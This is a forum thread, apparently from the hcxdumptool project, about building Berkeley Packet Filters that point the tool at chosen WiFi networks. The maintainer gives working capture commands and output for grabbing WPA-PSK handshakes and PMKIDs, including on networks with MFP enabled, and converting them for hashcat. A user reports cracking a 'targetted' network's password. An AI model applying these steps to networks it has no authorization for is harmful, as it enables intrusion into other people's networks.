Filter Option on new Hcxdumptool Version

[hyekalhitech]

Hi, Anybody here knows how to perform an attack for the specific network ? Currently I am using this command

sudo hcxdumptool -i wlan0 -w dumpfile.pcapng -F --rds=1
and its been targetting all the nearby network and I don't want that.

I already try something like :

sudo hcxdumptool -i wlan0 -w dumpfile.pcapng -F --rds=1 wlan0 addr1 XX:XX:XX:XX:XX:XX
but still it is targetting all the nearby network.

Please help, a little bit confused for me on this new version of Hcxdumptool, before this I used to use this command for filtering but now its unavailable anymore in the new version

--filterlist=myfilterhere.txt

[ZerBea]

Build a Berkeley Paket Filter and load it by hcxpcapngtool's option --bpf="your_filter.bpf"
An example is shown by --help.

A simple attack filter:
It the target MAC is 11:22:33:44:55:66 the filter is created by, e.g.:
$ tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 112233445566 -ddd > attack.bpf
It is loaded by
$ hcxdumptool -i INTERFACE --rds=1 -F --bpf=attack.bpf

To build a BPF it is mandatory to understand the addresses (addr1 add2 and addr3) of a 802.11 MAC header
https://www.geeksforgeeks.org/ieee-802-11-mac-frame/
and the syntax of the filter code
see man pcap-filter

Another example to attack 2 APs (AP1 11:22:33:44:55:66 and AP2 aa:bb:cc:dd:ee:ff)
$ tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 112233445566 or wlan addr3 aa:bb:cc:dd:ee:ff -ddd > attack.bpf

If hcxdumptool has been compiled with enabled internal BPF compiler, it is possible to build the filter by
$ hcxdumptool --bpfc="wlan addr3 112233445566 or wlan addr3 aa:bb:cc:dd:ee:ff" > attack.bpf

[hyekalhitech]

Hi @ZerBea , thank you so much for your prompt response. I do understand now the new version need to use tcpdump for filtering network. But may I know what does this means ?

$ tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 112233445566 -ddd > attack.bpf

-s ? 65535 ? - what is this?

And 1 more questions, can this method be used to attacking a 802.11w enabled ap?

Thanks in advance!

[ZerBea]

65535 is the size of the read buffer for incoming packets.
While hcxdumptool does know it, third party tools don't.

Some of hcxdumptool's attack vectors are working on NETWORKs running MFP (802.11w).
Old school DEAUTHENTICATION /DISASSOCIATION attack fails.

[ZerBea]

" wlan addr3 112233445566" is a very simple BPF,. Running it, you'll get a warning from hcxpcapngtool when converting the dump file to a hash file, because a lot of useful frames (e.g. undirected PROBEREQUESTs to wildcard SSID) are filtered out.

[hyekalhitech]

So network with MFP enabled also have a possibility to get a handshake / pmkid and getting deauth. So it is still possible to crack it via hashcat after converted it to hc22000 format even got a lot of error messages during convert?

[ZerBea]

Management Frame Protection (MFP) is a mechanism that prevent that a CLIENT can be deauthenticated from an AP by injecting DEAUTHENTICATION or DISASSOCIATION frames. As a result, this stupid attack will not work any longer.
MFP has no influence whatsoever on capturing a handshake and converting it to hc22000 format.

If hcxdumptool print a warning or an information, there is something wrong with the dump tool or the work flow.
While information messages can be ignored, warnings should be taken serious.

[ZerBea]

An example:

Information: missing frames!
This dump file does not contain undirected proberequest frames.
An undirected proberequest may contain information about the PSK.
It always happens if the capture file was cleaned or
it could happen if filter options are used during capturing.
That makes it hard to recover the PSK.

This always happens if you apply an attack filter like this one:
$ tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 112233445566 -ddd > attack.bpf
because undirected PROBEREQUESTs are filtered out.
It also happens if no CLIENT is in range and no undirected PROBEREQUEST frame has been received.

Building a filter like this one does not filter this frames out and the information message is now longer shown:
$ tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 112233445566 or wlan addr3 ffffffffffff -ddd > attack.bpf

BTW:
The filter options are the same ones that tshark, Wireshark, tcpdump and other network analyzers use.

[hyekalhitech]

@ZerBea So I see if there's is a MFP enabled network, chances of getting the Handshake / PMKID are not possible, am I right to say that ? If MFP are enabled then this tools won't be able to launch an attack to capture the handshake / PMKID and crack it using the hashcat.

So how do we now that AP is on MFP ? To know this AP is MFP enabled or disabled. Can we do that or not ?

$ tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 112233445566 or wlan addr3 ffffffffffff -ddd > attack.bpf

this command right here also will not work on MFP enabled network right ? because the hcxdumptool and tcpdump can't capture the handshake / pmkid.

The 112233445566 (this should be replaced with BSSID) am right?

[ZerBea]

Correct 112233445566 should be replaced by the MAC of the AP (BSSID).

[hyekalhitech]

The reason I keep asking you about the MFP because I ran this tool several times on my network and it seems unable to collect the handshake / pmkid on it, By referring to the legend indicator on hcxdumptool, there's nothing captured that I can work on hashcat / jtr.

[hyekalhitech]

@ZerBea Can you specify 1 command that can we use to capturing data on MFP enabled network ? I temporary use

sudo hcxdumptool -i wlan0 -w dumpfile.pcapng -F --rds=1

And it seems unable to capture my network handshake / pmkid, Im referring to the legend indicator, It didn't appear any star below the number that hashcat/jtr can work on.

[ZerBea]

The problem is this option "-F".
Default stay time on a channel is 5 seconds. If there is a lot of traffic on this channel, it is much more.
It takes too much time until hcxdumptool reaches the AP channel again.

Get operating channel (--rcascan=active).
Run hcxdumptool on that channel:
$ sudo hcxdumptool -i INTERFACE_NAME --rds=1 -c OPERATINGCHANNEL

Make sure you're running latest git head.
If a CLIENT is connected to the AP or if the AP use PMKID caching, it should take less than 10 seconds to get the hash data.
#361

[ZerBea]

A quick test on a MFP enabled NETWORK:

$ time hcxdumptool -i wlp5s0f3u2 --rds=1 -c 13a --exitoneapol=7
...
0 ERROR(s) during runtime
1365 Packet(s) captured by kernel
78 Packet(s) dropped by kernel
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
42 EPB written to pcapng dumpfile

exit on EAPOL M1M2

real	0m8,881s
user	0m0,013s
sys	0m0,020s

Running a filter is not needed, because the TEST NETWORK is the only one on channel 13a here.

$ hcxpcapngtool -o test.22000 20231226114532-wlp5s0f3u2.pcapng
hcxpcapngtool 6.3.2-32-gde1d781 reading from 20231226114532-wlp5s0f3u2.pcapng...

summary capture file
--------------------
file name................................: 20231226114532-wlp5s0f3u2.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.6.7-arch1-1
application..............................: hcxdumptool 6.3.2-134-g2f440bb
interface name...........................: wlp5s0f3u2
interface vendor.........................: 74da38
openSSL version..........................: 1.1
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 980ee4063595 (incremented on every new client)
MAC CLIENT...............................: 8c840194c5b4
REPLAYCOUNT..............................: 64522
ANONCE...................................: 78cf40b532e6c0125972c05e9906ac079dba590280bb6f2d341ab7d9786f074a
SNONCE...................................: 7515032510af866ce6d097e47f9e28a5d65d708be841cdc9a0f479515fa47625
timestamp minimum (GMT)..................: 26.12.2023 11:45:38
timestamp maximum (GMT)..................: 26.12.2023 11:45:40
duration of the dump tool (seconds)......: 2
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 42
packets received on 2.4 GHz..............: 42
ESSID (total unique).....................: 1
BEACON (total)...........................: 2
BEACON on 2.4 GHz channel (from IE_TAG)..: 13 
PROBEREQUEST (undirected)................: 1
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 5
AUTHENTICATION (OPEN SYSTEM).............: 5
ASSOCIATIONREQUEST (total)...............: 1
ASSOCIATIONREQUEST (PSK).................: 1
REASSOCIATIONREQUEST (total).............: 2
REASSOCIATIONREQUEST (PSK)...............: 2
EAPOL messages (total)...................: 30
EAPOL RSN messages.......................: 30
EAPOLTIME gap (measured maximum msec)....: 3
EAPOL ANONCE error corrections (NC)......: not detected
REPLAYCOUNT gap (measured maximum).......: 2
EAPOL M1 messages (total)................: 27
EAPOL M2 messages (total)................: 1
EAPOL M3 messages (total)................: 1
EAPOL M4 messages (total)................: 1
EAPOL M4 messages (zeroed NONCE).........: 1
EAPOL pairs (total)......................: 1
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M12E2 (challenge)..................: 1

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
 2472: 42	


session summary
---------------
processed pcapng files................: 1

[ZerBea]

Test NETWORK has been attacked successful and hash has been converted successful.

$ hcxdumptool -v
hcxdumptool 6.3.2-134-g2f440bb (C) 2023 ZeroBeat
running on Linux kernel 6.6.7-arch1-1
running GNU libc version 2.38
compiled by gcc 13.2.1
compiled with Linux API headers 6.4.0
compiled with GNU libc headers 2.38
enabled REALTIME DISPLAY
enabled GPS support
enabled BPF compiler

$ hcxpcapngtool -v
hcxpcapngtool 6.3.2-32-gde1d781 (C) 2023 ZeroBeat

$ hcxdumptool -l
  5	  8	74da38f1a374	3241e94f8f05	*	wlp5s0f3u2      	mt7601u	NETLINK

[ZerBea]

Now I try the same, running a filter:

$ time hcxdumptool -i wlp5s0f3u2 --rds=1 -c 13a --exitoneapol=7 --bpf=attack.bpf
...
0 ERROR(s) during runtime
351 Packet(s) captured by kernel
0 Packet(s) dropped by kernel
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
12 EPB written to pcapng dumpfile

exit on EAPOL M1M2

real	0m6,719s
user	0m0,003s
sys	0m0,014s

$ hcxpcapngtool -o test.22000 20231226115719-wlp5s0f3u2.pcapng
hcxpcapngtool 6.3.2-32-gde1d781 reading from 20231226115719-wlp5s0f3u2.pcapng...

summary capture file
--------------------
file name................................: 20231226115719-wlp5s0f3u2.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.6.7-arch1-1
application..............................: hcxdumptool 6.3.2-134-g2f440bb
interface name...........................: wlp5s0f3u2
interface vendor.........................: 74da38
openSSL version..........................: 1.1
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 78f944bf52e9 (incremented on every new client)
MAC CLIENT...............................: e804102f8451
REPLAYCOUNT..............................: 65025
ANONCE...................................: 87a2ed87bbd0a29bcca0bfa4d7b0a8cf3b7e84cba8a85f7df6462c9c006a7b59
SNONCE...................................: 0ece91a122e7c2b1b29a8d6695e6ad30722a07409c4c44ab9e366a834ea93bb6
timestamp minimum (GMT)..................: 26.12.2023 11:57:25
timestamp maximum (GMT)..................: 26.12.2023 11:57:25
duration of the dump tool (seconds)......: 0
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 12
packets received on 2.4 GHz..............: 12
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 13 
PROBEREQUEST (undirected)................: 1
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 1
AUTHENTICATION (OPEN SYSTEM).............: 1
EAPOL messages (total)...................: 8
EAPOL RSN messages.......................: 8
EAPOLTIME gap (measured maximum msec)....: 41
EAPOL ANONCE error corrections (NC)......: not detected
REPLAYCOUNT gap (measured maximum).......: 22
EAPOL M1 messages (total)................: 7
EAPOL M2 messages (total)................: 1
EAPOL pairs (total)......................: 1
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M12E2 (challenge)..................: 1

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
 2472: 12	

Information: missing EAPOL M3 frames!
This dump file does not contain EAPOL M3 frames (possible packet loss).
It strongly recommended to recapture the traffic or
to use --all option to convert all possible EAPOL MESSAGE PAIRs.

session summary
---------------
processed pcapng files................: 1

[ZerBea]

Due to the filter code, the second attack has been faster:

real	0m6,719s
versus
real	0m8,881s

and less packet has been captured:

351 Packet(s) captured by kernel
versus
1365 Packet(s) captured by kernel

All (for this test) unwanted packets have been filtered out (that include M3 messages), because we don't need them to confirm that everything is working as expected.

[ZerBea]

A good step would be to examine the differences between your configuration and mine:

1. an external WiFi adapter is used, because a PCIe card is not the best choice
2. latest Linux kernel (6.6.7)
3. driver is part of the Linux stock kernel
4. all services that take access to the device are stopped
5. hcxdumptool is set to operating channel of the AP
6. my test AP dos not support PMKID caching, but a test CLIENT is connected to it (we know the TEST PSK, so M1M2 is enough)
7. AP is configured to WPA-PSK (WPA1, WPA2, WPA2 key version 3 or to WPA2/WPA3 transition mode, MFP is enabled)

[hyekalhitech]

@ZerBea Hi, thank you so much for your clear explanation and shown me some usage example. So it is possible to capture a handshake / pmkid on MFP AP. How about if the AP is dual band? For example like :

TestAP-2.4ghz (MFP Enabled)
TestAP-5.0ghz (MFP Enabled)

It is still possible to capture the data on that particular network ? Even is my wireless card is support dual band, I only need to targeting my own 2.4ghz band is enough isn't it ?? or should I run 2 hcxdumptool on the same time ? One is for the 2.4ghz and the other for 5ghz?

Sorry for my newbie questions, this newer version its quite confusing me atm due to the command changes and the different output we are getting. Seems like a brand new tool for me which is more powerful. I did do my google research but I can say 99% guide are using the old command which technically not working anymore on this newer version of hcxdumptool.

[ZerBea]

If I understand it correct:
Your target is: TestAP-2.4ghz (MFP Enabled) and its operating channel is on 2.4 GHz

build a filter:
TestAP-2.4ghz (MFP Enabled) e.g. MAC 112233445566
$ tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 112233445566 or addr3 ffffffffffff > attack.bpf

and get the operating channel e.g. 6a
run hcxdumptool
$ sudo hcxdumptool -i INTERFACE --rds=1 -c 6a --bpf=attack.bpf -w test.pcapng

Important notice:
hcxdumptool attacks only WPA-PSK networks, it does not attack WPA3, WPS, EAP-SIM, open NETWORKs).

By default hcxdumptool attacks WPA-PSK APs and CLIENTs on channels 1a,6a,11a
If you don't want this you must set a Berkeley Packet Filter.
If you want to scan other frequencies than 1a,6a,11a you must use -c single channel(s) or -F (all frequencies) option.
If you want to scan channels 12a,13a or 5,6,7GHz you must set the regulatory domain.

[hyekalhitech]

Hi @ZerBea sorry for the late reply. Thank you so much for your explanation and example. I will come back to you once I tried with the filter options. I didn't want it to simply attack all the nearby network instead of mine.

I will try the Berkeley Packet Filter option and will revert back to you asap. Thank you so much !, also did you have any social platform for the community to sharing and asking questions such as Discord ?

[LLH-l]

Although purpose is same, but their use concepts diff
Hit a target, need make a lot detours reach to it
but if have a straight line can hit direct the target,all people happy
hcxdumptool -i INTERFACENAME -w dp.pcapng --rds=1 --BSSID 11:22:33:44:55:66
It simpler and faster completion work
We should allow everyone use 2 methods
in additional: the all messages stored in one file and alone file storing is also different concept . ( although they can be separated )

If use simpler and easier , all people will move to hcxdumptool
This also a favorable for rapid ecological development.

[ZerBea]

You might expect me to recommend that everyone should be using hcxdumptool/hcxtools. But the fact of the matter is, hcxdumptool/hcxtools is NOT recommended to be used by inexperienced users or newbies.

BTW:
hcxdumptool use tshark/Wireshark syntax
"--BSSID" is aircrack-ng syntax

[ZerBea]

The BPF way.
Create a BPF for every purpose and store it to your BPF directory

$ hcxdumptool --bpfc="wlan addr3 1a:1b:1c:1d:1e:1f" > bpf/1a1b1c1d1e1f.bpf
$ hcxdumptool --bpfc="wlan addr3 2a:2b:2c:2d:2e:2f" > bpf/2a2b2c2d2e2f.bpf
$ hcxdumptool --bpfc="wlan addr3 3a:3b:3c:3d:3e:3f" > bpf/3a3b3c3d3e3f.bpf

Run hcxdumptool with the desired BPF:

$ sudo hcxdumptool -F --bpf=bpf/1a1b1c1d1e3f.bpf --exitoneapol=7 -w 1a1b1c1d1e3f.pcapng
$ sudo hcxdumptool -F --bpf=bpf/2a2b2c2d2e3f.bpf --exitoneapol=7 -w 2a2b2c2d2e3f.pcapng
$ sudo hcxdumptool -F --bpf=bpf/3a3b3c3d3e3f.bpf --exitoneapol=7 -w 3a3b3c3d3e3f.pcapng

[LLH-l]

I don't relationship, I just agreed he the issues

[hyekalhitech]

Hi @ZerBea , when I run for a while this command :

sudo hcxdumptool -i wlan0 --rds=1 --beacon_off --bpf=filter.bpf --essidlist=essid.list -F --exitoneapol=7 -w dila0801v4.pcapng

I got this output which means exit on eapol M1M2

I thought I was succesfully captured the necessary files for my target network (DilaAnuar), but when I try to convert the pcapng file using the hcxpcapngtool it gave me this error.

$ hcxpcapngtool -o dilav4.22000 dila0801v4.pcapng 
hcxpcapngtool 6.3.2-34-g58d9bc2 reading from dila0801v4.pcapng...

summary capture file
--------------------
file name................................: dila0801v4.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.5.0-kali3-amd64
application..............................: hcxdumptool 6.3.2-162-ga519943
interface name...........................: wlan0
interface vendor.........................: e0e1a9
openSSL version..........................: 1.0
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 780b8cb78e14 (incremented on every new client)
MAC CLIENT...............................: d85dfb6db8a0
REPLAYCOUNT..............................: 62260
ANONCE...................................: 52eb1d8efc90bff4d93839d5585ed836366fa2f0d86d19c479c2692d5d6d4b62
SNONCE...................................: f544019dda4d17ab17506cfac5ab40aba1d2fd200118e1f27c3218418b37a302
timestamp minimum (GMT)..................: 08.01.2024 07:37:07
timestamp maximum (GMT)..................: 08.01.2024 08:03:51
duration of the dump tool (minutes)......: 26
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 138
packets received on 2.4 GHz..............: 114
packets received on 5 GHz................: 24
ESSID (total unique).....................: 9
BEACON (total)...........................: 1
BEACON on 5/6 GHz channel (from IE_TAG)..: 36 
ACTION (total)...........................: 1
ACTION (containing ESSID)................: 1
PROBEREQUEST (undirected)................: 7
PROBERESPONSE (total)....................: 2
AUTHENTICATION (total)...................: 4
AUTHENTICATION (OPEN SYSTEM).............: 4
EAPOL messages (total)...................: 123
EAPOL RSN messages.......................: 123
EAPOL ANONCE error corrections (NC)......: not detected
EAPOL M1 messages (total)................: 122
EAPOL M2 messages (total)................: 1

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
 2412: 1         2417: 1         2422: 1         2427: 1
 2432: 1         2437: 64        2442: 43        2447: 1
 2462: 1         5180: 22        5220: 2

Information: missing EAPOL M3 frames!
This dump file does not contain EAPOL M3 frames (possible packet loss).
It strongly recommended to recapture the traffic or
to use --all option to convert all possible EAPOL MESSAGE PAIRs.

Information: no hashes written to hash files


session summary
---------------
processed pcapng files................: 1

do you know why? thanks in advance ? @ZerBea

[hyekalhitech]

I still running airodump-ng and aireplay-ng on the other workstation and it seems like many clients are connected but didn't capture in client window on hcxdumptool. :(

[hyekalhitech]

latest capture on wireshark, use the new wifi adapter (MT7921AU) Chipset (Comfast). Please have a look.
@ZerBea

capture.zip

[ZerBea]

I got this output which means exit on eapol M1M2.
No.

If hcxdumptool got a MESSAGPAIR as wanted by option exitoneapol it will terminate and print the exit status.
This is an exit status if an EAPOL M1M2 has been received.

153 packet(s) captured
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
15 EPB written to pcapng dumpfile

exit on EAPOL M1M2
bye-bye

That is not the case, because you are out of range of the CLIENTs.

Take a look at hcxdumptool's status display:
Only an EAPOL M1 from the AP and no PMKID because AP doesn't use 802.11w
The + in the R columns means that the AP is in range of hcxdumptool.
M3 column is empty because hcxdumptool has not received an EAPOL frame of a CLIENT.
As a result, hcpcapngtool find nothing to convert.

You can repeat this a hundred times. As long as the CLIENTs are out of range of the attack device (too far away, broken antenna connector, bad RX sensitivity) you will not get a 4way handshake.

You're running 5GHz.
Please note that the range of a 5GHz signal is much less than the range of a 2.4GHz signal:
https://www.highspeedinternet.com/resources/2-4-ghz-vs-5-ghz-wi-fi
https://www.lifewire.com/range-of-typical-wifi-network-816564

[ZerBea]

No packets going to the AP inside the dump file:

$ tshark  -r capture.pcapng -Y "wlan.da == 08:93:56:7d:c3:c0 and radiotap.channel.freq == 5180"
$ 

But a lot coming from the AP:

$ tshark  -r capture.pcapng -Y "wlan.sa == 08:93:56:7d:c3:c0 and radiotap.channel.freq == 5180"
    1 12:54:59,982794757 08:93:56:7d:c3:c0 → ff:ff:ff:ff:ff:ff 802.11 458 5180 Beacon frame, SN=2364, FN=0, Flags=........, BI=100, SSID="Dila Anuar_5Hz@Maxis"
    4 12:55:00,084259241 08:93:56:7d:c3:c0 → ff:ff:ff:ff:ff:ff 802.11 458 5180 Beacon frame, SN=2365, FN=0, Flags=........, BI=100, SSID="Dila Anuar_5Hz@Maxis"
...
 1971 12:55:52,000458811 08:93:56:7d:c3:c0 → ff:ff:ff:ff:ff:ff 802.11 458 5180 Beacon frame, SN=2924, FN=0, Flags=........, BI=100, SSID="Dila Anuar_5Hz@Maxis"
 1974 12:55:52,103842069 08:93:56:7d:c3:c0 → ff:ff:ff:ff:ff:ff 802.11 458 5180 Beacon frame, SN=2925, FN=0, Flags=........, BI=100, SSID="Dila Anuar_5Hz@Maxis"

[hyekalhitech]

@ZerBea I know the 200m is too far. But before this I tested it on the same floor which I have been running the attack with full signal. But still failed. The 200m / 50m / 20m is just a test, even though it was impossible, but my other network can. Same step perfromed with the Dila Anuar, but it failed. Of course before this the router and me just beside me.

[ZerBea]

Again:
"Dila Anuar" was in range of your attack device and the AP replied to hcxdumptool's request with an EAPOL M1.
The AP does not transmit a PMKID so its (by hcxdumptool requested M1) is useless.

Absolutely no CLIENT associated to "Dila Anuar" was received by your attack device.
As result you got no EAPOL M2 to calculate a valid MESSAGE PAIR.

This has been confirmed by your Wireshark dump files.

As long as you do not receive frames from the CLIENTs you will not get a valid MESSAGE PAIR, hashcat or JtR can work on.

[hyekalhitech]

Hi @ZerBea , can you please check on the latest Wireshark dump files, for this BSSID, does it contains frames from the CLIENTs ? Because all of this network that I own, I can get the valid MESSAGE PAIR, hashcat or JtR can work on even I didn't connected to it.

28:F8:D6:A5:2A:C1
28:F8:D6:A5:2A:F1
94:AB:0A:8C:9D:01
0C:0E:76:D2:7A:17

[ZerBea]

Display filter syntax is (to be used to filter traffic from a dump file):
wlan.ta == 28:F8:D6:A5:2A:C1 or wlan.ta == 28:F8:D6:A5:2A:F1 or wlan.ta == 94:AB:0A:8C:9D:01 or wlan.ta == 0C:0E:76:D2:7A:17
example:
$ tshark -r capture.pcapng -Y "wlan.ta == 28:F8:D6:A5:2A:C1 or wlan.ta == 28:F8:D6:A5:2A:F1 or wlan.ta == 94:AB:0A:8C:9D:01 or wlan.ta == 0C:0E:76:D2:7A:17"

Capture filter syntax is (to be used to filter traffic from an interface):
wlan addr2 28:F8:D6:A5:2A:C1 or wlan addr2 28:F8:D6:A5:2A:F1 or wlan addr2 94:AB:0A:8C:9D:01 or wlan addr2 0C:0E:76:D2:7A:17
example:
$ tshark -i INTERFACE_NAME -f "wlan addr2 28:F8:D6:A5:2A:C1 or wlan addr2 28:F8:D6:A5:2A:F1 or wlan addr2 94:AB:0A:8C:9D:01 or wlan addr2 0C:0E:76:D2:7A:17"

It is mandatory to set monitor mode and channel before you start capturing with tshark either bi "iw" or by
$ hcxdumptool -m " INTERFACE_NAME" -c channel

This dump file does not(!) contain frames from the MACs you requested above.
#388 (reply in thread)

$ tshark -r capture.pcapng -Y "wlan.ta == 28:F8:D6:A5:2A:C1 or wlan.ta == 28:F8:D6:A5:2A:F1 or wlan.ta == 94:AB:0A:8C:9D:01 or wlan.ta == 0C:0E:76:D2:7A:17"
$

I recommend to learn capture and display filter syntax, because I don't have the time to do this analysis for you in future times.
https://duckduckgo.com/?t=h_&q=tshark+filterung+video+tutorial&ia=web

[hyekalhitech]

@ZerBea understood the usage now. I will try it again in different location keep you updated. Thank you so much !

[LLH-l]

@hyekalhitech Hello
the long-distance capture experiment no discussion significance
long-distance too far away, antenna bad RX sensitivity,
severe channel interference in the surrounding environment
different models AP also have different sensitivity
etc.etc...

You should conduct in 15m range test capture ( MFP AP )

[hyekalhitech]

Hello @LLH-l , thank you for your suggestion, yes I will try again and revert back the results, thank you so much. Appreciate it !

[theweefies]

I think i have something that will address the single network targeting issue i know a lot of folks that use this are facing.

Was able to make some mods to hcxdumptool to automate creation of BPF for a single BSSID. Added --bssid / -b option to pass mac address:

1. validates mac address
2. runs tcpdump command to create BPF
3. checks bpf for content/creation
4. Uses existing bpfname var to set name of BPF file for existing processing
5. standard error checking
6. created line-by-line changelog

This merely makes targeting a single network a much faster processing than having to build the tcpdump command string every time and makes pivoting a much faster and more successful experience.

Any interest in integrating this?

[ZerBea]

No, I'm not interested to add additional code to do some automation that can be done by bash scripts (e.g. in combination with hcxdumptool's build in BPF compiler).
A simple --BSSID is far away from a complex BPF like the one I've used to test USB adapters.
If a user is not able to build a filter tailored to his target, he shouldn't use hcxdumptool.

As I mentioned before. Feel free to fork hcxdumptool and to add all this features to it. It would be great to have more than one hcxdumptool to discover new weak points in 802.11.

One of the lessons I've learned is that every new feature has a price tag (performance, complexity). I don't want to pay that price.

[theweefies]

that's fine. I'll probably fork. my point is that a user should not have to create a bpf filter every time they want to use hcxdumptool, imho (there are exceptions to this for nuanced cases, of course). For sessions targeting a specific network, which i would argue is probably a good number of use cases, it is silly to me that someone has to run an external script or command to use hcxdumptool. in the professional world, folks are likely not blasting away at every network out there. At least i hope not.

Sure, i would also expect the same level of competency from users to be able to create a BPF, but for the love of god it is annoying af to have to do this every time i want to pivot to a different network.

Your point about every new feature having a price tag is 100% accurate and i wholeheartedly agree. What I offer you is a zero complexity increase, zero performance loss addition that makes the life of your users easier. If you still decline, no harm no foul. But, i did want to provide you with a semi-professional opinion that i think accurately reflects the user base. This thread probably wouldn't exist if this was not something folks were concerned about.

Anyway, i really appreciate the quick and thorough responses you provide, and i absolutely appreciate the work and attention you give to this project. much respect.

[ZerBea]

I fully agree, but:
I've never claimed that hcxdumtool and hcxtools are easy to use and the requirements are high (as mentioned in README.md).
I've never recommended that newbies should use this tools (as mentioned in README.md).
There are several really good and easy to use all in one tools like:
AngryOxide
wifite2
aircrack-ng
airgeddon
and the list is long.

BTW: Have you ever seen such a "--BSSID" option at tshark, Wireshark or tcpdump?

Thanks for your offer. Please do a fork,add all your ideas and feature requests.
Now that I know there will be a user friendly all in one fork, I can put my focus on pure performance.

Two weeks ago:
#397 (comment)

Now:
Please make up your own mind.
After removing the entire user friendly stuff:

process packet: 1513 nsec
process packet: 1352 nsec
process packet: 1112 nsec
process packet: 1623 nsec
process packet: 1092 nsec
process packet: 1483 nsec
process packet: 1272 nsec
process packet: 1513 nsec
process packet: 1162 nsec

time measurement included the entire path: read packet -> respond to packet;

System Utilization:

$ top:
  8187 root      20   0    8316   4224   2816 S   0,3   0,0   0:00.03 hcxdumptool            

static u64 t1;
static u64 t2;

static struct timespec ts1;
static struct timespec ts2;

clock_gettime(CLOCK_REALTIME, &ts1);
t1 = ((u64)ts1.tv_sec * 1000000000ULL) + ts1.tv_nsec;
-> function to be tested <-
clock_gettime(CLOCK_REALTIME, &ts2);
t2 = ((u64)ts2.tv_sec * 1000000000ULL) + ts2.tv_nsec;
printf("process packet: %" PRIu64 "\n", t2 - t1);  

You can only win a race with a fast car, but never ever with a stylish good-looking car.
If you link performance and user-friendliness, your fork will be great.

[hyekalhitech]

Hi @ZerBea , so here is my latest update about trying to capturing a handshake / pmkid regarding my targetted network : DilaAnuar.

I ordered a new antenna to make sure that everything is working perfectly but unfortunately my parcel got missing from the courier services and got my refund. So I didn't have the new antenna to test it out with hcxdumptool.

However, I succesfully captured the 4way Handshake for my target network using the same antenna on my MTK7612U network adapter (the one that I used the most with hcxdumptool) by using the another tools called AngryOxide

I know you must heard of this tool because the owner says this tools was inspired by yours (hcxdumptool)

So I test using that tool with my same network adapter and the old antenna, same testing spot, same client and same AP distance. I succesfully captured a 4way handshake in about 4-5 minutes as you can see below:

So by using the handshake from Angry Oxide, I succesfully cracked the password of my targetted network using hashcat. (Of course its easy to guess since I already know the password pattern)

So, I don't know why my router is not vulnerable with hcxdumptool, aircrack-ng, and airgeddon attack, but it is working on Angry Oxide tools and I believe the process is quite similiar with hcxdumptool.

When I succesfully captured the handshake using AngryOxide, I run a test with hcxdumptool but still I failed. I did not changed anything such as my workstation, my clients, my AP distance and password. But still I was unable to capture the handshake by using the bpf filter. Im quite confused what is wrong with my hcxdumptool and still figure it out why.

[ZerBea]

I know about this great tool and I strongly recommend to use it, because it is a thousand times more user friendly especially for newbies.

But this has a price tag:
As you mentioned:
AngryOxide

captured a 4way handshake in about 4-5 minutes

$ top:
  11212 root      20   0  282208   8368   6000 R  67,8   0,0   0:06.25 angryoxide             

hcxdumptool (onyl if you really know what you are doing):

exit on EAPOL M1M2
real	0m8,334s

$ top:
  8187 root      20   0    8316   4224   2816 S   0,3   0,0   0:00.03 hcxdumptool         

Maybe you'll soon get a better and user friendly fork of hcxdumptool done by @theweefies which provide an easy way to build a filter.

[ZerBea]

BTW:
We are talking about price tags.

This is the price tag of the "user-friendly" real time display:

realtimedisplay: 3077511 nsec
realtimedisplay: 3114168 nsec
realtimedisplay: 3068683 nsec
realtimedisplay: 2864273 nsec
realtimedisplay: 3300745 nsec
realtimedisplay: 3368702 nsec
realtimedisplay: 2963267 nsec
realtimedisplay: 3491651 nsec
realtimedisplay: 3265530 nsec

You might think 3077511 nsec isn't so much, but:

This is the elapsed time between received packets (and hcxdumptool must respond between them):

$ tshark -r test.pcapng -T fields -e frame.time | cut -c 23-

725559386 CET
728752162 CET
728771107 CET
728888275 CET
728901750 CET
728922679 CET
729238848 CET
741468798 CET

Please make up your own mind how many packets are dropped/unresponsed while processing the real time display, e.g.:

realtimedisplay: 3114168 nsec
received packets:
728752162 CET
728771107 CET
728888275 CET
728901750 CET
728922679 CET
729238848 CET

Please note: hcxdumptool can (controlled by the BPF) run head-less (without real time display).
When you exactly know what you're doing (BPF), there is absolutely no need to waste so much time.

[hyekalhitech]

